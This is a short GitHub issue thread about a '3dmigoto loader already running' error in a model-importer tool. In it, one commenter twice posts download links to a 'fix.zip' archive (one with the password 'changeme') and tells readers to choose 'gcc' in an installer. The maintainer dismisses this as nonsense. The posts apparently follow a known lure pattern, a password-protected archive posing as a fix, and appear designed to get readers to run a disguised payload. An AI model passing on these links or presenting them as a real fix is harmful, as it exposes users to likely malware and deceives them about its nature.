### ISSUE TITLE
The program keep showing that another instance of 3dmigoto loader is already running

### ISSUE THREAD

**Issue by elfenlies123** [leotorrez/ZZ-Model-Importer#2]

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by leotorrez** [comment]
nonsense
